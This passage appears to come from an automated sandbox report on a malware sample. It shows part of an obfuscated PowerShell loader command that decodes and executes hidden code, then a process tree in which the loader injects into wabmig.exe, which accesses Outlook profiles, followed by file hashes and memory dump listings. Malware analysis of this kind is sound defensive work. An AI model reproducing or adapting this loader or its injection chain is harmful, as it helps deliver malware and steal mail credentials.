KolonGKajareEdbs,t Inte-HomozC Nat op osenFladetFornueNybygnHermetSkalo Ciste$Insu SPar.iuInstrbBumbls absttTransiVarialWoodseFri,o ');Gabeller (carene 'senge$Hacklg lealBorshoOzon,bFellaaMed clchori:perfeCDei.ieForanrE sneu C sttBioges Po.a ve,et=M,tal Water[,epacS fganyBes ns SountMugngeCarabm Anno.VejkaCRwan,o ApianDiscivForeseKet,hrMacrotBehag],kade: F,rm: uckmFDe isr QuavoGannymLudosBHopliaS.vadsOronaeEyv,n6Liste4 HjreSAllottB,sttr rsoniH,jttnor hogFermo(Skros$N.graFPrec rTortio ,onfsFugtftRlighbRnkefi InharSpiradBesta) fter ');Gabeller (carene 'Coinc$CardogErythlIstidoSwin.bGodkea envilAn if:SottiFB cillGenfoofulleoProf e Fo,ry Inta Hyper=Beskf Noner[BlundSPresey,onadsP oxitElm eeD minmBlotl. OrdkTLumineoksefxa ouctAppar.MilieEFabl nSe vmcJerbooFluordRho aiLovrenBrnergBanko]grsen:S.cia: TogbAJobsgShjrneC .upeIMoralIchopi.RemouG injee CenttChimeSUnmoutBaandrNoviciWin en ecengInton(.reve$ O igCSlumre.viber.udieuCir utTestssSil,e) dnv ');Gabeller (carene 'Bo rd$AppetgAfterlIns.foMytilbUntwiaT neml Wino:Ndr sT Skrih Duo uUnstasnietznFrigreAfladl Unded SavvaRenvasD ste=Cookn$ErythFInnovlGreinoBoldboIlluveF.rneyBulle. ,inds ivesu ranbLsengs NbestMona rFireli Heren rolagS.vni(Kris $OverhBBestneSeksts Hospu,ygosd.rapplBistaiDomesn RinggBla.keNdrinnSubsts Laqu,Ly ke$ CystFBesynrunvoliFreebturteku Skrar RenteEkvi kDekl o Re tg Pe oelide n PoppdAmat e,rnsesLinje)Adopt ');Gabeller $Thusneldas;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1156
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nyhavn1.Wil && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1540
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4996

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yhjzwxjj.oqs.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823
      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-523280732-2327480845-3730041215-1000\0f5007522459c86e95ffcc62f32308f1_a5c5e2ae-85e3-447c-9e0b-c9a7b966d823
      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Nyhavn1.Wil
      Filesize

      417KB

      MD5

      8d03d24981c8f001de1f6eb0dac25266

      SHA1

      b578ea5440c26b9f03f9a6364a4a0f3b7e813181

      SHA256

      93d4c756ad029c691887b2bc352f9e1fc4fa3030e489381834da996a51f561a8

      SHA512

      b65a08a61c2fcac6f6ab8d747651e0b4e4acf1650c851b364436673bed075d086ca18e1d6a7ca6a7939cbf1647ab8aad189c38ae808a28a47bd5b0e4343ed1b5

      Download Submit

    • memory/1156-40-0x0000000007F30000-0x00000000084D4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1156-36-0x0000000007300000-0x000000000797A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/1156-42-0x00000000084E0000-0x000000000CE0A000-memory.dmp

      Filesize

      73.2MB

      Download

    • memory/1156-39-0x0000000006CF0000-0x0000000006D12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1156-18-0x0000000000B90000-0x0000000000BC6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1156-19-0x0000000004EB0000-0x00000000054D8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1156-20-0x0000000004BF0000-0x0000000004C12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1156-21-0x0000000004CA0000-0x0000000004D06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1156-22-0x0000000004D80000-0x0000000004DE6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1156-32-0x00000000054E0000-0x0000000005834000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1156-33-0x0000000005AC0000-0x0000000005ADE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1156-34-0x0000000005B00000-0x0000000005B4C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1156-38-0x0000000006D60000-0x0000000006DF6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1156-37-0x0000000006060000-0x000000000607A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3816-15-0x00007FF83D2D3000-0x00007FF83D2D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3816-35-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-17-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-0-0x00007FF83D2D3000-0x00007FF83D2D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3816-12-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-16-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-43-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-61-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-11-0x00007FF83D2D0000-0x00007FF83DD91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3816-7-0x000001A360D30000-0x000001A360D52000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4996-44-0x0000000001200000-0x0000000005B2A000-memory.dmp

      Filesize

      73.2MB

      Download

    • memory/4996-58-0x0000000001200000-0x0000000005B2A000-memory.dmp

      Filesize

      73.2MB

      Download